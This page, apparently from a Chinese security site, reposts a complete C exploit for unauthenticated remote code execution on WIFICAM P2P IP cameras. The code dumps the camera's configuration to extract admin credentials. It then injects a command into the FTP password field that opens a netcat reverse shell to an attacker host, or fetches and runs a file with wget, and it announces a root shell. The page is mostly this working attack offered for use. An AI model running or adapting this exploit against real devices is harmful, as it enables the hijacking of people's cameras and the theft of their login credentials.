首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution 来源：https://pierrekim.github.io 作者：PierreKimSec 发布时间：2017-11-15   # Exploit-DB Note ~ Source: https://pierrekim.github.io/advisories/expl-goahead-camera.c # Exploit-DB Note ~ Credit: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html   #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <arpa/inet.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h>     #define CAM_PORT 80 #define REMOTE_HOST "192.168.1.1" #define REMOTE_PORT "1337" #define PAYLOAD_0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" REMOTE_HOST "+" REMOTE_PORT "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n" #define PAYLOAD_1 "GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n" #define PAYLOAD_2 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n"     #define ALTERNATIVE_PAYLOAD_zero0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" REMOTE_HOST "+" REMOTE_PORT "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n" #define ALTERNATIVE_PAYLOAD_zero1 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" REMOTE_HOST "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"   char *    creds(char  *argv,                 int   get_config);   int       rce(char    *argv,               char    *id,               char    attack[],               char    desc[]);     int   main(int        argc,            char       **argv,            char       **envp) {   char                *id;     printf("Camera 0day root RCE with connect-back @PierreKimSec\n\n");     if (argc < 2)   {      printf("%s target\n", argv[0]);      printf("%s target --get-config      will dump the configuration and exit\n", argv[0]);      return (1);   }     if (argc == 2)     printf("Please run `nc -vlp %s` on %s\n\n", REMOTE_PORT, REMOTE_HOST);     if (argc == 3 && !strcmp(argv[2], "--get-config"))     id = creds(argv[1], 1);   else     id = creds(argv[1], 0);      if (id == NULL)   {     printf("exploit failed\n");     return (1);   }   printf("done\n");     printf("    login = %s\n", id);   printf("    pass  = %s\n", id + 32);     if (!rce(argv[1], id, PAYLOAD_0, "planting"))     printf("done\n");   sleep(1);   if (!rce(argv[1], id, PAYLOAD_1, "executing"))     printf("done\n");   if (!rce(argv[1], id, PAYLOAD_2, "cleaning"))     printf("done\n");   if (!rce(argv[1], id, PAYLOAD_1, "cleaning"))     printf("done\n");     printf("[+] enjoy your root shell on %s:%s\n", REMOTE_HOST, REMOTE_PORT);     return (0); }     char *    creds(char  *argv,                 int   get_config) {   int                 sock;   int                 n;   struct sockaddr_in  serv_addr;   char                buf[8192] = { 0 };   char                *out;   char                *tmp;   char                payload[] = "GET /system.ini?loginuse&loginpas HTTP/1.0\r\n\r\n";   int                 old_n;   int                 n_total;       sock = 0;   n = 0;   old_n = 0;   n_total = 0;     printf("[+] bypassing auth ... ");     if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)   {     printf("Error while creating socket\n");     return (NULL);   }         memset(&serv_addr, '0', sizeof(serv_addr));   serv_addr.sin_family = AF_INET;   serv_addr.sin_port = htons(CAM_PORT);     if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)   {     printf("Error while inet_pton\n");     return (NULL);   }     if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)   {     printf("creds: connect failed\n");     return (NULL);   }     if (send(sock, payload, strlen(payload) , 0) < 0)   {     printf("creds: send failed\n");     return (NULL);   }     if (!(tmp = malloc(10 * 1024 * sizeof(char))))     return (NULL);     if (!(out = calloc(64, sizeof(char))))     return (NULL);     while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)   {     n_total += n;     if (n_total < 1024 * 10)       memcpy(tmp + old_n, buf, n);     if (n >= 0)       old_n = n;   }     close(sock);     /*   [ HTTP HEADERS ]   ...     000????: 0000 0a0a 0a0a 01.. .... .... .... ....                 ^^^^ ^^^^ ^^                 Useful reference in the binary data                 in order to to find the positions of                 credentials   ...   ...   0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........   00006a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................   00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........   00006c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................   ...     NOTE: reference can be too:   000????: 0006 0606 0606 0100 000a .... .... ....     Other method: parse everything, find the "admin" string and extract the associated password   by adding 31bytes after the address of 'a'[dmin].   Works if the login is admin (seems to be this by default, but can be changed by the user)   */     if (get_config)   {     for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)       printf("%c", tmp[j]);     exit (0);   }       for (unsigned int j = 50; j < 10 * 1024; j++)   {      if (tmp[j - 4] == 0x0a &&          tmp[j - 3] == 0x0a &&          tmp[j - 2] == 0x0a &&          tmp[j - 1] == 0x0a &&          tmp[j]     == 0x01)      {        if (j + 170 < 10 * 1024)        {          strcat(out, &tmp[j + 138]);          strcat(out + 32 * sizeof(char), &tmp[j + 170]);          free(tmp);            return (out);        }      }   }     free(tmp);     return (NULL); }   int       rce(char    *argv,               char    *id,               char    attack[],               char    desc[]) {   int                 sock;   struct sockaddr_in  serv_addr;   char                *payload;     if (!(payload = calloc(512, sizeof(char))))     return (1);     sock = 0;     printf("[+] %s payload ... ", desc);     if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)   {     printf("Error while creating socket\n");     return (1);   }     memset(&serv_addr, '0', sizeof(serv_addr));   serv_addr.sin_family = AF_INET;   serv_addr.sin_port = htons(CAM_PORT);     if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)   {     printf("Error while inet_pton\n");     return (1);   }     if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)   {     printf("rce: connect failed\n");     return (1);   }       sprintf(payload, attack, id, id + 32);   if (send(sock, payload, strlen(payload) , 0) < 0)   {     printf("rce: send failed\n");     return (1);   }     return (0); }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Ulterius Server < 1.9.5.0 - Di ·Dup Scout Enterprise 10.0.18 - ·PHP 7.1.8 - Heap-Based Buffer ·D-Link DIR605L - Denial of Ser ·Allworx Server Manager 6x / 6x ·Microsoft Edge Object.setProto ·D-Link DIR-850L Unauthenticate ·Microsoft Edge Chakra JIT Type ·IKARUS anti.virus 2.16.7 - 'nt ·Microsoft Edge Charka JIT Inco ·Web Viewer 1.0.0.193 (Samsung ·Microsoft Edge Chakra JIT Bail   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved